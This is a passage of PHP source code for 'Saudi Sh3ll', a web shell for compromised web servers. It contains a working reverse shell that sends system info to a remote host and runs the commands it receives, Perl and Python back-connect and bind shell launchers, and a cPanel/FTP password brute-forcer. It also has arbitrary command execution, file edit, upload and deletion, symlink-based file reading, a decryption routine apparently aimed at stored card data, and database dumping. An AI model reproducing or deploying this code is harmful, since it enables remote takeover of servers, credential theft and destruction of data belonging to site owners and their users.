EVycm9yIGNvbm5lY3Rpb24i";
  2590.  
  2591. ////////////////////////// php ///////////////////////
  2592. if ($op == 'php')
  2593. {
  2594.  
  2595. $sockfd=fsockopen($ip , $port , $errno, $errstr );
  2596.  
  2597. if($errno != 0)
  2598. {
  2599. echo "$errno : $errstr";
  2600. }
  2601. else if (!$sockfd)
  2602. {
  2603. $result = "error connect!</p>";
  2604. }
  2605. else
  2606. {
  2607. fputs ($sockfd ,
  2608. "
  2609. /################################\
  2610. # #
  2611. # Saudi Sh3ll v1.0 #
  2612. # #
  2613. # by al-swisre #
  2614. # #
  2615. \################################/");
  2616. $pwd = shell_exec("pwd");
  2617. $sysinfo = shell_exec("uname -a");
  2618. $id = shell_exec("id");
  2619. $len = 1337;
  2620. fputs($sockfd ,$sysinfo . "\n" );
  2621. fputs($sockfd ,$pwd . "\n" );
  2622. fputs($sockfd ,$id ."\n\n" );
  2623. while(!feof($sockfd))
  2624. {
  2625. $cmdPrompt ="(Saudi sh3ll)[$]> ";
  2626. fputs ($sockfd , $cmdPrompt );
  2627. $command= fgets($sockfd, $len);
  2628. fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
  2629. }
  2630. fclose($sockfd);
  2631. }
  2632.  
  2633. echo "End Connect";
  2634. exit;
  2635. }
  2636.  
  2637.  
  2638.  
  2639.  
  2640. elseif ($op == 'perl')
  2641. {
  2642.  
  2643.  
  2644. op_sa("/tmp/sa.pl",$back_perl);
  2645. $out = cmd("perl /tmp/sa.pl ".$ip." ".$port." 1>/dev/null 2>&1 &");
  2646. sleep(1);
  2647. echo "<pre>$out\n".cmd("ps aux | grep sa.pl")."</pre>";
  2648. unlink("/tmp/sa.pl");
  2649.  
  2650.  
  2651.  
  2652. }
  2653.  
  2654.  
  2655.  
  2656. elseif ($op == 'python')
  2657. {
  2658.  
  2659.  
  2660. op_sa("/tmp/sa.py",$back_py);
  2661. $out = cmd("python /tmp/sa.py ".$ip." ".$port." 1>/dev/null 2>&1 &");
  2662. sleep(1);
  2663. echo "<pre>$out\n".cmd("ps aux | grep sa.py")."</pre>";
  2664.  
  2665.  
  2666.  
  2667.  
  2668. }
  2669.  
  2670. }
  2671. else if ($_POST['con'] == 'Connect bind'){
  2672. /////////////////////// bind /////////////////////
  2673.  
  2674. if ($op == 'perl')
  2675. {
  2676.  
  2677.  
  2678.  
  2679. $bind_port = $_POST['bind_port'];
  2680.  
  2681. op_sa("/tmp/sa.pl",$bind_perl);
  2682. $out = cmd("perl /tmp/sa.pl ".$bind_port." 1>/dev/null 2>&1 &");
  2683. sleep(1);
  2684. echo "<pre>$out\n".cmd("ps aux | grep sa.pl")."</pre>";
  2685. unlink("/tmp/sa.pl");
  2686.  
  2687.  
  2688.  
  2689. }
  2690.  
  2691. else if ($op == 'python')
  2692. {
  2693.  
  2694.  
  2695. $bind_port = $_POST['bind_port'];
  2696.  
  2697. op_sa("/tmp/sa.py",$bind_py);
  2698. $out = cmd("python /tmp/sa.py ".$bind_port." 1>/dev/null 2>&1 &");
  2699. sleep(1);
  2700. echo "<pre>$out\n".cmd("ps aux | grep sa.py")."</pre>";
  2701. unlink("/tmp/sa.py");
  2702.  
  2703.  
  2704.  
  2705.  
  2706.  
  2707.  
  2708. }
  2709.  
  2710.  
  2711.  
  2712.  
  2713.  
  2714.  
  2715. }}
  2716.  
  2717.  
  2718.  
  2719.  
  2720.  
  2721. break;
  2722.  
  2723. ////////////////////////////////////////// BruteForce /////////////////////
  2724.  
  2725. case 'brt':
  2726.  
  2727. echo "<br /><br /><div class='cont3'><a href='$pg?sws=brt'>[ BruteForce ]</a></div><br />";
  2728.  
  2729.  
  2730.  
  2731. if (!isset($_POST['bru']))
  2732. {
  2733.  
  2734. echo '<form method="post">
  2735.  
  2736. <textarea name="user" cols="30" rows="15">userlist</textarea>
  2737. <textarea name="pass" cols="30" rows="15">passlist</textarea><br /><br />
  2738. target : <input type="text" name="trg" value="localhost" />&nbsp;&nbsp;&nbsp;
  2739. <select name="op">
  2740. <option value="cpanel">cpanel</option>
  2741. <option value="ftp">ftp</option>
  2742. </select><br /> <br />
  2743. <input type="submit" name="bru" value="brute" />
  2744. </form>';
  2745.  
  2746. exit;
  2747. }else
  2748. {
  2749.  
  2750. $users = $_POST['user'];
  2751. $pass = $_POST['pass'];
  2752. $option = $_POST['op'];
  2753. $connect_timeout=5;
  2754. @ini_set('memory_limit', 1000000000000);
  2755. $target = $_POST['trg'];
  2756. @set_time_limit(0);
  2757.  
  2758. $userlist = explode ("\n" , $users );
  2759. $passlist = explode ("\n" , $pass );
  2760.  
  2761. foreach ($userlist as $user) {
  2762. $_user = trim($user);
  2763. foreach ($passlist as $password ) {
  2764. $_pass = trim($password);
  2765. if($option == "ftp"){
  2766. ftp_check($target,$_user,$_pass,$connect_timeout);
  2767. }
  2768. if ($option == "cpanel")
  2769. {
  2770. cpanel_check($target,$_user,$_pass,$connect_timeout);
  2771. }
  2772. }
  2773. }
  2774.  
  2775.  
  2776.  
  2777.  
  2778. }
  2779.  
  2780.  
  2781.  
  2782.  
  2783.  
  2784.  
  2785. break;
  2786.  
  2787.  
  2788. ///////////////////////////////////////////////////// about ///////////////////////////////////////////
  2789. case 'ab':
  2790.  
  2791. echo '<div class="hedr"> <img src="http://im15.gulfup.com/2012-02-03/1328281037731.png" alt="Saudi Shell" > </div><br /> ';
  2792. echo "<div class='ab'><table cellpadding='5' align='center'>";
  2793. echo "<tr><td><b>Coded By :</b> al-swisre</td></tr>";
  2794. echo "<tr><td><b>E-mail :</b> oy3@hotmail.com</td></tr>";
  2795. echo "<tr><td><b>From :</b> Saudi Arabian</td></tr>";
  2796. echo "<tr><td><b>Age :</b> 2/1995</td></tr>";
  2797. echo "<tr><td><b>twitter :</b> <a target='_blank'href='https://twitter.com/#!/al_swisre'>al_swisre</a></td></tr>";
  2798. echo "<tr><td><b>S.Greetz 2 :</b> Mr.Alsa3ek - Ejram Hacker</td></tr>";
  2799. echo "<tr><td><b>Greetz 2 :</b> e.V.E.L - G-B - kinG oF coNTrol - w0LF Gh4m3D - iNjeCt - abu halil 501 - Mr.Pixy </td></tr><tr><td><b>And :</b> Mr.Black - IraQiaN-r0x - Oxygen - locked - n4ss .. and All members of v4-team.com </td></tr></div>";
  2800.  
  2801. exit;
  2802. break;
  2803.  
  2804.  
  2805.  
  2806.  
  2807.  
  2808.  
  2809.  
  2810.  
  2811.  
  2812. }
  2813.  
  2814.  
  2815.  
  2816.  
  2817.  
  2818.  
  2819.  
  2820.  
  2821. }
  2822. else
  2823. {
  2824. /////////// File Manager //////////////
  2825.  
  2826. $sws = 'al-swisre' ;
  2827. if ($sws != 'al-swisre'){echo "Coded by al-swisre"; exit;}
  2828.  
  2829. if(@$_GET['dir']){
  2830. $dir = $_GET['dir'];
  2831. if($dir != 'nullz') $dir = @cleandir($dir);
  2832. }
  2833.  
  2834. $curdir = @cleandir(@getcwd());
  2835. $self = $_SERVER['PHP_SELF'];
  2836. $me = $_SERVER['PHP_SELF'];
  2837.  
  2838. if($dir=="") $dir = $curdir;
  2839. $dirx = explode(DIRECTORY_SEPARATOR, $dir);
  2840. $files = array();
  2841. $folders = array();
  2842. echo"<br /><div class='t33p'><table cellpadding='0' align='center' width='100%' >";
  2843. echo"<tr><td style=\"text-align: left\" >";
  2844. echo" Your path : &nbsp;";
  2845. for($i=0;$i<count($dirx);$i++){
  2846. @$totalpath .= $dirx[$i] . DIRECTORY_SEPARATOR;
  2847. echo("<a href='" . $me . "?dir=$totalpath" . "'>$dirx[$i]</a>" . DIRECTORY_SEPARATOR);
  2848. }
  2849. echo "<td></tr></table></div><br />";
  2850. echo"<div class='t3p'><table cellpadding='0' align='center' width='100%' >";
  2851. echo"<tr><td>Name</td><td>Size</td><td>Modify</td><td>Owner/Group</td><td>Permissions</td><td>Option<td></td></tr>";
  2852. if ($handle = @opendir($dir)) {
  2853. while (false != ($link = readdir($handle))) {
  2854. $on3 = @posix_getpwuid(@fileowner($dir."/".$link)) ;
  2855. $gr = @posix_getgrgid(@filegroup($dir."/".$link));
  2856. if (@is_dir($dir . DIRECTORY_SEPARATOR . $link)){
  2857. $file = array();
  2858. @$file['link'] = "<a href='$me?dir=$dir" . DIRECTORY_SEPARATOR . "$link'>[ $link ]</font></a>";
  2859. $file['pir'] = "<a href='?sws=chmod&file=$link&dir=$dir'\">".@wsoPermsColor($dir."/".$link)."</a>";
  2860. $file['pir2'] = "<a href='?sws=chmod&file=$link&dir=$dir'\">".@perm($dir."/".$link)."</a>";
  2861.  
  2862. $folder = "<tr><td> ".$file['link']."</td><td>dir</td><td>".date('Y-m-d H:i:s', @filemtime($dir."/".$link))."</td><td>".$on3['name']."/".$gr['name']."</td><td>".$file['pir']."&nbsp;&nbsp;&nbsp;".$file['pir2']."<td><a href='?sws=rname&file=$link&dir=$dir'\">R</a> - <a href='?sws=chmod&file=$link&dir=$dir'\">C</a> - <a href='?sws=rm&file=$link&dir=$dir'\">rm</a></td></td></tr></div>" ;
  2863.  
  2864. array_push($folders, $folder);
  2865. }
  2866. else{
  2867. $file = array();
  2868. $ext = @strpos($link, ".") ? @strtolower(end(explode(".", $link))) : "";
  2869. $file['pir'] = "<a href='?sws=chmod&file=$link&dir=$dir'\">".@wsoPermsColor($dir."/".$link)."</a>";
  2870. $file['pir2'] = "<a href='?sws=chmod&file=$link&dir=$dir'\">".@perm($dir."/".$link)."</a>";
  2871. $file['size'] = @number_format(@filesize($dir."/".$link)/1024,2);
  2872. @$file['link'] = "<a href='?sws=edit&file=$link&dir=$dir'\">".$link ."</a>";
  2873. $file = "<tr><td>".$file['link']."</td><td>".$file['size']."</td><td>".date('Y-m-d H:i:s', @filemtime($dir."/".$link))."</td><td>".$on3['name']."/".$gr['name']."</td><td>".$file['pir']."&nbsp;&nbsp;&nbsp;".$file['pir2']."<td><a href='?sws=edit&file=$link&dir=$dir'\">E</a> - <a href='?sws=rname&file=$link&dir=$dir'\">R</a> - <a href='?sws=chmod&file=$link&dir=$dir'\">C</a> - <a href='?sws=dow&file=$link&dir=$dir'\">D</a> - <a href='?sws=rm&file=$link&dir=$dir'\">rm</a></td></td></tr></div>" ;
  2874. array_push($files, $file);
  2875. }
  2876.  
  2877. }
  2878. asort($folders);
  2879. asort($files);
  2880.  
  2881. foreach($folders as $folder) echo $folder;
  2882. foreach($files as $file) echo $file;
  2883. echo "</table></div>" ;
  2884. closedir($handle);
  2885.  
  2886.  
  2887. }
  2888.  
  2889.  
  2890.  
  2891.  
  2892.  
  2893.  
  2894.  
  2895.  
  2896.  
  2897.  
  2898.  
  2899.  
  2900.  
  2901.  
  2902. }
  2903.  
  2904.  
  2905. if ($_GET['sws'] == 'rname')
  2906. {
  2907.  
  2908. $dir = $_GET['dir'];
  2909.  
  2910. $file = $_GET['file'];
  2911.  
  2912. if (!isset($file) or !isset ($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}
  2913.  
  2914. if (!isset($_POST['edit']))
  2915. {
  2916.  
  2917. echo "<br />
  2918. <div class=\"cont3\"> <a href='?sws=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?sws=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?sws=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?sws=dow&file=$file&dir=$dir'\">Download</a>
  2919. <a href='?sws=rm&file=$file&dir=$dir'\">Delete</a></div><br />
  2920. dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']." <br /> <br />
  2921. <form method='post'>
  2922. new name : <input type='text' value='$file' name='name' /><br /><br />
  2923. <input type='submit' value='edit' name='edit' />
  2924.  
  2925. </form>
  2926.  
  2927. ";
  2928. }else
  2929. {
  2930.  
  2931. $new = $_POST['name'];
  2932.  
  2933. $rn = @rename ($dir."/".$file,$dir."/".$new);
  2934.  
  2935. if(!$rn)
  2936. {
  2937.  
  2938.  
  2939. @cmd("cd $dir;mv $file $new ");
  2940.  
  2941.  
  2942. }else
  2943. {
  2944.  
  2945. echo "<br /><br />Name change successfully";
  2946.  
  2947. echo "<br /><br /><a href='?sws=rname&file=$new&dir=$dir'\">[ Back ]</a>";
  2948.  
  2949. }
  2950.  
  2951.  
  2952.  
  2953. }
  2954. }
  2955.  
  2956.  
  2957.  
  2958.  
  2959.  
  2960. if ($_GET['sws'] == 'chmod')
  2961. {
  2962.  
  2963. $dir = $_GET['dir'];
  2964.  
  2965. $file = $_GET['file'];
  2966.  
  2967. if (!isset($file) or !isset($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}
  2968.  
  2969. if (!isset($_POST['edit']))
  2970. {
  2971.  
  2972. echo "<br />
  2973. <div class=\"cont3\"> <a href='?sws=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?sws=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?sws=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?sws=dow&file=$file&dir=$dir'\">Download</a>
  2974. <a href='?sws=rm&file=$file&dir=$dir'\">Delete</a></div><br />
  2975. dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']." <br /> <br />
  2976. <form method='post'>
  2977. File to chmod: <input type='text' value=".$dir."/".$file." name='file' />&nbsp;&nbsp;&nbsp;<select name=\"ch\">
  2978. <option value=\"755\">755</option>
  2979. <option value=\"777\">777</option>
  2980. <option value=\"644\">644</option>
  2981. </select>
  2982. <br /><br /><input type='submit' value='chmod' name='edit' />
  2983.  
  2984. </form>
  2985.  
  2986. ";
  2987. }
  2988. else
  2989. {
  2990.  
  2991. $pir = $_POST['ch'];
  2992.  
  2993. if ($pir == '755'
  2994. )
  2995.  
  2996. {
  2997. $cd = @chmod($_POST['file'],0775);
  2998. }
  2999. elseif ($pir == '777')
  3000. {
  3001. $cd = @chmod($_POST['file'],0777);
  3002.  
  3003. }
  3004. elseif ($pir == '644')
  3005. {
  3006.  
  3007. $cd = $cd = @chmod($_POST['file'],0644);
  3008.  
  3009. }
  3010.  
  3011. if(!$cd)
  3012. {
  3013. echo "ERROR";
  3014.  
  3015. }else
  3016. {
  3017.  
  3018. echo "changed Successfully";
  3019. echo "<br /><br /><a href='?sws=chmod&file=$file&dir=$dir'\">[ Back ]</a>";
  3020.  
  3021.  
  3022. }
  3023.  
  3024. }
  3025. }
  3026.  
  3027. if ($_GET['sws'] == 'edit')
  3028. {
  3029.  
  3030. $file = $_GET['file'];
  3031. $dir = $_GET['dir'];
  3032.  
  3033. if (!isset($file) or !isset($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}
  3034.  
  3035. if (!isset($_POST['ed']))
  3036. {
  3037.  
  3038. $fil33 = @fopen($dir."/".$file, 'r');
  3039. $content = @fread($fil33, @filesize($dir."/".$file));
  3040.  
  3041. echo "
  3042. <div class=\"cont3\"> <a href='?sws=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?sws=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?sws=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?sws=dow&file=$file&dir=$dir'\">Download</a>
  3043. <a href='?sws=rm&file=$file&dir=$dir'\">Delete</a></div>
  3044. <br />
  3045. dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']." <br /> <br />
  3046. <form method=\"post\">
  3047. <br /><textarea cols=\"85\" rows=\"25\" name=\"fil3\">";
  3048. echo htmlentities($content) . "\n";
  3049. echo '
  3050. </textarea>
  3051. <br /><br />
  3052. <input type="submit" name="ed" value="Save !"/>
  3053. </form>
  3054.  
  3055. ';
  3056.  
  3057. }
  3058. else
  3059. {
  3060.  
  3061.  
  3062. $oo = @fopen($dir."/".$file, 'w');
  3063. $ow = @fwrite($oo, @stripslashes($_POST['fil3']));
  3064. @fclose($oo);
  3065. if (!$ow){echo "Error";}else {
  3066. echo header("Location: ?sws=edit&file=$file&dir=$dir");
  3067. }
  3068.  
  3069.  
  3070.  
  3071.  
  3072.  
  3073. }
  3074.  
  3075.  
  3076.  
  3077.  
  3078. }
  3079. else if ($_GET['sws'] == 'dow')
  3080. {
  3081. $file = $_GET['file'];
  3082. $dir = $_GET['dir'];
  3083.  
  3084. @sa_download ($dir."/".$file);
  3085.  
  3086.  
  3087. }
  3088. /////////////////////////////////////////////////////
  3089. if ($_GET['sws'] == 'rm')
  3090. {
  3091.  
  3092. $dir = $_GET['dir'];
  3093.  
  3094. $file = $_GET['file'];
  3095.  
  3096. if (!isset($file) or !isset ($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}
  3097.  
  3098. if (!isset($_POST['edit']))
  3099. {
  3100.  
  3101. echo "<br />
  3102. <div class=\"cont3\"> <a href='?sws=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?sws=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?sws=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?sws=dow&file=$file&dir=$dir'\">Download</a>
  3103. <a href='?sws=rm&file=$file&dir=$dir'\">Delete</a></div>
  3104. <br />
  3105. dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']." <br /> <br />
  3106. <form method='post'>
  3107. <input type='submit' value='Delete' name='edit' />
  3108.  
  3109. </form>
  3110.  
  3111. ";
  3112. }else
  3113. {
  3114.  
  3115.  
  3116. $rn = @unlink ($dir."/".$file);
  3117.  
  3118. if(!$rn)
  3119. {
  3120.  
  3121.  
  3122. $rn = @rmdir ($dir."/".$file);
  3123.  
  3124.  
  3125.  
  3126. }elseif (!$rn)
  3127. {
  3128. $rn = @cmd("cd $dir;rm $file");
  3129.  
  3130. }
  3131. else if (!$rn){@cmd ("cd $dir;rm -r $file");}
  3132. else{
  3133.  
  3134. echo header("Location: $pg?dir=$dir");
  3135. }
  3136.  
  3137. echo header("Location: $pg?dir=$dir");
  3138.  
  3139. }
  3140. }
  3141. ///////////////////////////////////////////////////////////////////////////////// mkdir //////////////////////////////
  3142.  
  3143. else if ($_GET['sws'] == 'mkdir')
  3144. {
  3145.  
  3146.  
  3147. $dir = $_POST['dir'];
  3148. $file = $_POST['n4me'];
  3149.  
  3150. $mkdir = @mkdir ($dir."/".$file,0755);
  3151.  
  3152. if (!$mkdir){@cmd ("mkdir $dir/$file ");}else {header("Location: $pg?dir=$dir"); }
  3153. header("Location: $pg?dir=$dir");
  3154.  
  3155. }
  3156.  
  3157.  
  3158. else if ($_GET['sws'] == 'mkfile')
  3159. {
  3160.  
  3161. $dir = $_POST['dir'];
  3162. $file = $_POST['n4me'];
  3163.  
  3164.  
  3165. $mkdir = @fopen($dir."/".$file,'w');
  3166.  
  3167. if (!$mkdir){@cmd ("touch $dir/$file ");}else {header("Location: $pg?dir=$dir"); }
  3168.  
  3169.  
  3170. }
  3171.  
  3172. else if ($_GET['sws'] == 'up')
  3173. {
  3174.  
  3175.  
  3176. $dir = $_POST['dir'];
  3177.  
  3178.  
  3179. if(@move_uploaded_file($_FILES['upfile']['tmp_name'], $dir."/".$_FILES['upfile']['name'])) { header("Location: $pg?dir=$dir"); }
  3180. else { echo '<br /><br />Not uploaded !!<br><br>';exit; }
  3181.  
  3182. }
  3183.  
  3184.  
  3185. //////////////////////////// read file /////////////////////
  3186.  
  3187. else if ($_GET['sws'] == 'rfile')
  3188. {
  3189.  
  3190.  
  3191.  
  3192. $file = $_POST['n4me'];
  3193.  
  3194. echo "dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']." <br /> <br /> ";
  3195.  
  3196. if (!isset($file)){$file = $_GET['dir']."/".$_GET['file'];}
  3197.  
  3198. echo "<div>";
  3199.  
  3200. $r3ad = @fopen($file, 'r');
  3201. if ($r3ad){
  3202. $content = @fread($r3ad, @filesize($file));
  3203. echo "<pre>".htmlentities($content)."</pre>";
  3204. }
  3205. else if (!$r3ad)
  3206. {
  3207. echo "<pre>";
  3208. $r3ad = @show_source($file) ;
  3209. echo "</pre>";
  3210. }
  3211. else if (!$r3ad)
  3212. {
  3213. echo "<pre>";
  3214. $r3ad = @highlight_file($file);
  3215. echo "</pre>";
  3216. }
  3217. else if (!$r3ad)
  3218. {
  3219. echo "<pre>";
  3220. $sm = @symlink($file,'sym.txt');
  3221.  
  3222.  
  3223. if ($sm){
  3224. $r3ad = @fopen('sym.txt', 'r');
  3225. $content = @fread($r3ad, @filesize($dir."/".$file));
  3226. echo "<pre>".htmlentities($content)."</pre>";
  3227. }
  3228. }
  3229.  
  3230. echo "</div>";
  3231.  
  3232. //////////////////////// cmd /////////////////////////////////
  3233.  
  3234.  
  3235. }else if ($_GET['sws'] == 'cmd')
  3236. {
  3237. $cmd = $_POST['n4me'];
  3238. $dir = $_POST['dir'];
  3239.  
  3240. if (isset($cmd))
  3241. {
  3242.  
  3243.  
  3244. echo "<br /><textarea cols='65' rows='25' name='fil3'> ";
  3245.  
  3246. echo @cmd("cd $dir;$cmd") ;
  3247.  
  3248. echo " </textarea>";
  3249.  
  3250.  
  3251.  
  3252. }
  3253.  
  3254.  
  3255.  
  3256.  
  3257. }
  3258. else if ($_GET['sws'] == 'site')
  3259. {
  3260.  
  3261.  
  3262.  
  3263.  
  3264. $read = @file_get_contents("http://networktools.nl/reverseip/$ips") ;
  3265.  
  3266. $sit3 = @findit($read,"<pre>","</pre>");
  3267.  
  3268. echo "<br /><div class='site'><pre> ";
  3269.  
  3270.  
  3271. echo $sit3;
  3272.  
  3273. echo "</pre> </div>";
  3274.  
  3275. exit;
  3276.  
  3277.  
  3278. }
  3279.  
  3280.  
  3281.  
  3282.  
  3283.  
  3284.  
  3285.  
  3286.  
  3287.  
  3288.  
  3289. if(@$_GET['dir']){
  3290. $dir = $_GET['dir'];
  3291. if($dir != 'nullz') $dir = cleandir($dir);
  3292. }
  3293.  
  3294. echo "
  3295.  
  3296. <br /><br />
  3297. </div><div class='d0n'>
  3298. <br /><br />
  3299. <table align=\"center\" cellpadding=\"0\" cellspacing=\"0\" width=\"80%\" >
  3300.  
  3301. <tr><td><form method='GET''>
  3302. Change dir : <br />
  3303. <input type='text' name='name' value='$dir' size='25' />
  3304. <input type='hidden' name='dir' value='$dir' />
  3305.  
  3306. <input type='submit' value='Go' />
  3307. </form> </td>
  3308.  
  3309. <td style=\"float: left\"> <form method='POST' action='$pg?sws=mkdir' >
  3310.  
  3311. Make dir :<br />
  3312. <input type='text' name='n4me' size='25' />
  3313. <input type='hidden' name='dir' value='$dir' />
  3314. <input type='submit' value='Go' /></div>
  3315. </form></td></tr>
  3316.  
  3317.  
  3318. <tr><td><form method='post' action='$pg?sws=rfile'>
  3319. read file : <br />
  3320. <input type='text' name='n4me' size='25' />
  3321. <input type='hidden' name='dir' value='$dir' />
  3322. <input type='submit' value='Go' />
  3323. </form> </td>
  3324.  
  3325.  
  3326. <td style=\"float: left\"> <form method='post' action='$pg?sws=mkfile' >
  3327.  
  3328. Make file :<br />
  3329. <div style=\"text-align: right\">
  3330. <input type='text' name='n4me' size='25' />
  3331. <input type='hidden' name='dir' value='$dir' />
  3332. <input type='submit' value='Go' /></div>
  3333. </form></td></tr>
  3334.  
  3335.  
  3336. <tr><td><form method='POST' action='$pg?sws=cmd'>
  3337. Execute : <br />
  3338. <input type='text' name='n4me' size='25' />
  3339. <input type='hidden' name='dir' value='$dir' />
  3340. <input type='submit' value='Go' />
  3341. </form> </td>
  3342. <b></b>
  3343.  
  3344.  
  3345. <td style=\"float: left\">
  3346. <form method='POST' enctype=\"multipart/form-data\" action='$pg?sws=up' >
  3347. Upload file :<br />
  3348. <div style=\"text-align: right\">
  3349. <input type='file' name='upfile' value='Choose file' size='21' />
  3350. <input type='hidden' name='dir' value='$dir' />
  3351. <input type='submit' value='Up' />
  3352. </form></td></tr>
  3353.  
  3354.  
  3355.  
  3356. </table>
  3357. </div>
  3358. ";
  3359. //////////////////////////////////////// exit :d //////////////////////////
  3360.  
  3361.  
  3362.  
  3363.  
  3364.  
  3365.  
  3366.  
  3367.  
  3368.  
  3369.  
  3370.  
  3371.  
  3372.  
  3373.  
  3374.  
  3375.  
  3376.  
  3377.  
  3378.  
  3379.  
  3380.  
  3381.  
  3382.  
  3383. function cmd($cfe)
  3384. {
  3385. $res = '';
  3386. if (!empty($cfe))
  3387. {
  3388. if(function_exists('exec'))
  3389. {
  3390. @exec($cfe,$res);
  3391. $res = join("\n",$res);
  3392. }
  3393. elseif(function_exists('shell_exec'))
  3394. {
  3395. $res = @shell_exec($cfe);
  3396. }
  3397. elseif(function_exists('system'))
  3398. {
  3399. @ob_start();
  3400. @system($cfe);
  3401. $res = @ob_get_contents();
  3402. @ob_end_clean();
  3403. }
  3404. elseif(function_exists('passthru'))
  3405. {
  3406. @ob_start();
  3407. @passthru($cfe);
  3408. $res = @ob_get_contents();
  3409. @ob_end_clean();
  3410. }
  3411. elseif(@is_resource($f = @popen($cfe,"r")))
  3412. {
  3413. $res = "";
  3414. while(!@feof($f)) { $res .= @fread($f,1024); }
  3415. @pclose($f);
  3416. }
  3417. }
  3418. return $res;
  3419. }
  3420.  
  3421. function sa($i)
  3422. {
  3423. return @str_repeat("&nbsp;",$i);
  3424. }
  3425.  
  3426.  
  3427.  
  3428. function decrypt ($string,$cc_encryption_hash)
  3429. {
  3430. $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  3431. $hash_key = _hash ($key);
  3432. $hash_length = strlen ($hash_key);
  3433. $string = base64_decode ($string);
  3434. $tmp_iv = substr ($string, 0, $hash_length);
  3435. $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  3436. $iv = $out = '';
  3437. $c = 0;
  3438. while ($c < $hash_length)
  3439. {
  3440. $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  3441. ++$c;
  3442. }
  3443.  
  3444. $key = $iv;
  3445. $c = 0;
  3446. while ($c < strlen ($string))
  3447. {
  3448. if (($c != 0 AND $c % $hash_length == 0))
  3449. {
  3450. $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  3451. }
  3452.  
  3453. $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  3454. ++$c;
  3455. }
  3456.  
  3457. return $out;
  3458. }
  3459.  
  3460.  
  3461. function _hash ($string)
  3462. {
  3463. $hash = (function_exists ('sha1')) ? sha1($string):md5($string);
  3464. $out = '';
  3465. $c = 0;
  3466. while ($c < strlen ($hash))
  3467. {
  3468. $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  3469. $c += 2;
  3470. }
  3471. return $out;
  3472. }
  3473.  
  3474. function backup_tables($path,$host,$user,$pass,$name,$tables = '*')
  3475. {
  3476.  
  3477. $link = @mysql_connect($host,$user,$pass);
  3478. @mysql_select_db($name,$link);
  3479.  
  3480. //get all of the tables
  3481. if($tables == '*')
  3482. {
  3483. $tables = array();
  3484. $result = @mysql_query('SHOW TABLES');
  3485. while($row = @mysql_fetch_row($result))
  3486. {
  3487. $tables[] = $row[0];
  3488. }
  3489. }
  3490. else
  3491. {
  3492. $tables = is_array($tables) ? $tables : explode(',',$tables);
  3493. }
  3494.  
  3495. //cycle through
  3496. foreach($tables as $table)
  3497. {
  3498. $result = mysql_query('SELECT * FROM '.$table);
  3499. $num_fields = mysql_num_fields($result);
  3500.  
  3501. $row2 = mysql_fetch_row(mysql_query('SHOW CREATE TABLE '.$table));
  3502. $return.= "\n\n".$row2[1].";\n\n";
  3503.  
  3504. for ($i = 0; $i < $num_fields; $i++)
  3505. {
  3506. while($row = mysql_fetch_row($result))
  3507. {
  3508. $return.= 'INSERT INTO '.$table.' VALUES(';
  3509. for($j=0; $j<$num_fields; $j++)
  3510. {
  3511. $row[$j] = addslashes($row[$j]);
  3512. $row[$j] = ereg_replace("\n","\\n",$row[$j]);
  3513. if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
  3514. if ($j<($num_fields-1)) { $return.= ','; }
  3515. }
  3516. $return.= ");\n";
  3517. }
  3518. }
  3519. $return.="\n\n\n";
  3520. }
  3521.  
  3522. //save file
  3523. $handle = @fopen($path,'w+');
  3524. @fwrite($handle,$return);
  3525. @fclose($handle);
  3526. }
  3527.  
  3528. function search($string){
  3529. $q = mysql_query("SHOW TABLE STATUS");
  3530. $data = array();
  3531. while($table = mysql_fetch_array($q)){
  3532. $query = "SELECT * FROM $table[Name]";
  3533. $result = mysql_query($query);
  3534. $row = @mysql_fetch_assoc($result);
  3535. if(!$row){
  3536. continue;
  3537. }
  3538. $columns = array_keys($row);
  3539. $data[$table['Name']] = $columns;
  3540. }
  3541. $tables = array();
  3542. foreach($data as $table=>$columns){
  3543. $query = "SELECT * FROM `$table` WHERE ";
  3544. foreach($columns as $key=>$column){
  3545. if($key == 0){
  3546. $query .= "`$column` LIKE '%$string%'";
  3547. }else{
  3548. $query .= " OR `$column` LIKE '%$string%'";
  3549. }
  3550. }
  3551. $query = mysql_query($query);
  3552. $result = mysql_num_rows($query);
  3553. if($result > 0){
  3554. $tables[] = $table;
  3555. }
  3556. }
  3557. $founded = array();
  3558. foreach($tables as $table){
  3559. $columns = $data[$table];
  3560. foreach($columns as $column){
